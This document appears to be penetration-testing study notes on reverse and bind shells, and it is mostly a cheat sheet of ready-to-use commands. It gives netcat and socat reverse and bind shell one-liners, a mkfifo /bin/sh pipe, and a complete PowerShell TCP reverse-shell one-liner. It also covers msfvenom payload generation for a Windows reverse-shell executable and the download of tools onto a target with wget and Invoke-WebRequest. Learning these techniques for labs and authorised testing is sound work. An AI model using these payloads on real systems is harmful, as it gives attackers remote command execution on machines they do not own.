What the Shell

shells are what we use when interfacing with a Command Line environment (CLI)

examples of shells, as are cmd.exe and Powershell on Windows.

Can use https://www.revshells.com/ to generate reverse shells

Tools:

Netcat:

It can be used to receive reverse shells and connect to remote ports attached to bind shells on a target system.

Socat:

Socat is like netcat on steroids. It can do all of the same things, and many more.

Both Socat and Netcat have .exe versions for use on Windows.

Metasploit -- multi/handler

The exploit/multi/handler module is used to receive reverse shells. It's also the only way to interact with a meterpreter shell

Msfvenom:

Msfvenom is used to generate payloads on the fly. Kali Linux also comes pre-installed with a variety of webshells located at /usr/share/webshells

Types of Shell:

At a high level, we are interested in two kinds of shell when it comes to exploiting a target: Reverse shells, and bind shells.

Reverse shells are when the target is forced to execute code that connects back to your computer.

Bind shells are when the code executed on the target is used to start a listener attached to a shell directly on the target.

Reverse shells are easier to execute and debug

Revserse Shell: listening on our own attacking machine, and sending a connection from the target.

Bind Shell: Listening on the target, then connecting to it with our own machine.

listener: sudo rlwrap nc -lvnp 443

Netcat:

syntax: nc -lvnp <port-number>, l: listener -v: verbose output -n:resolve hostnames or DNS -p: port specification. sudo nc -lvnp 443

to obtain a bind shell on a target assuming that there is already a listener, all we need to do is connect to it

nc <target-ip> <chosen-port>

Shell Stabilization:

Technique 1: Python (applicable to only Linux)

s1: use python -c 'import pty;pty.spawn("/bin/bash")', unable to use use tab autocomplete or the arrow keys

s2: export TERM=xterm, gives access to "clear' command

s3: background the shell using Ctrl + Z, use stty raw -echo; fg: it turns off our own terminal echo ( gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill), then foregrounds the shell, thus completing the process.

Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.

Technique 2: rlwrap

rlwrap gives us access to history, tab autocompletion and the arrow keys upon receiving a shell

sudo apt install rlwrap to install

rlwrap nc -lvnp <port> to invoke listener

When dealing with a Linux target, completely stabilise, by using the same trick: background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilise and re-enter the shell.

Technique 3: Socat

limited to Linux targets

sudo python3 -m http.server 80 - setting up python3 webserver on the attacking machine

using the netcat shell to download the file accomplished with curl or wget (wget <LOCAL-IP>/socat -O /tmp/socat).

in a Windows CLI environment

Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe

With any of the above techniques, it's useful to be able to change your terminal tty size. It must be done manually in a reverse or bind shell.

run stty -a, Note down the values for "rows" and columns:

stty rows <number>

stty cols <number>

This will change the registered width and height of the terminal, thus allowing programs such as text editors which rely on such information being accurate to correctly open

Socat:

socat is as a connector between two points (listening port and keyboard / file)

Reverse shell:

socat TCP-L:<port> -: basic reverse shell listener

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes to listen back on Linux

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li": to connect back on Windows

Bind Shells:

socat TCP-L:<PORT> EXEC:"bash -li" - Linux

socat TCP-L:<PORT> EXEC:powershell.exe,pipes - Windows

socat TCP:<TARGET-IP>:<TARGET-PORT> - :Connect to waiting Listener

socat TCP-L:<port> FILE:`tty`,raw,echo=0 - new listener syntax

-d -d : to increase verbosity

socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 - : setup openssl listener

socat OPENSSL-LISTEN:53 FILE:tty,raw,echo=0,cert=encrypt.pem,verify=0 : using the tty technique

socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane - connect back to this listener if ip is 1010.10.5

Common Shell Payloads:

nc -lvnp <PORT> -e /bin/bash - result in a bind shell to execute process on connection

nc <LOCAL-IP> <PORT> -e /bin/bash - reverse shell

mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f - listener for bind shell on linux

mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f - netcat reverse shell listener

When targeting a modern Windows Server, it is very common to require a Powershell reverse shell, so we'll be covering the standard one-liner PSH reverse shell here:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

To use this, we need to replace "<IP>" and "<port>", then copy into a cmd.exe shell, resulting in a reverse shell.

PayloadsAllTheThings

is a repository containing a wide range of shell codes (usually in one-liner format for copying and pasting), in many different languages.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Msfnvenom:

Part of the Metasploit framework, msfvenom is the one-stop-shop for all things payload related. generate payloads in various formats (e.g. .exe, .aspx, .war, .py)

msfvenom -p <PAYLOAD> <OPTIONS> - standard syntax

msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port> : generate a Windows x64 Reverse Shell in an exe format

-f <format> : specify output format ( exe)

-o <file> : output location and filename for the generated payload

LHOST=<IP> : Ip to connect back to

LPORT=<port> : port on local machine to connect back to

Staged / Stageless payloads

Staged payloads doesn't actually contain any reverse shell code by itself. Instead it connects to the listener and uses the connection to load the real payload. Staged payloads require a special listener -- usually the Metasploit multi/handler

Stageless payloads are entirely self-contained in that there is one piece of code which, when executed, sends a shell back immediately to the waiting listener.

Stageless payloads are denoted with underscores (_) : windows/shell_reverse_tcp

staged payloads are denoted with another forward slash (/) : shell/reverse_tcp

Payload Naming:

<OS>/<arch>/<payload>

linux/x86/shell_reverse_tcp : generate a stageless reverse shell for an x86 Linux target

windows/shell_reverse_tcp : for windows

for Meterpreter payloads: windows/x64/meterpreter/reverse_tcp (Windows 64 bit) : linux/x86/meterpreter_reverse_tcp (Linux 32 bit)

msfvenom --list payloads : list all avaliable payloads, use pipe (| grep) to search for specfic payloads

The important take away from this task:

Reverse and Bind shells are an essential technique for gaining remote code execution on a machine, however, they will never be as fully featured as a native shell. Ideally we always want to escalate into using a "normal" method for accessing the machine, as this will invariably be easier to use for further exploitation of the target.

PreviousWeb EnumerationNextUpload Vulnerabilities

Last updated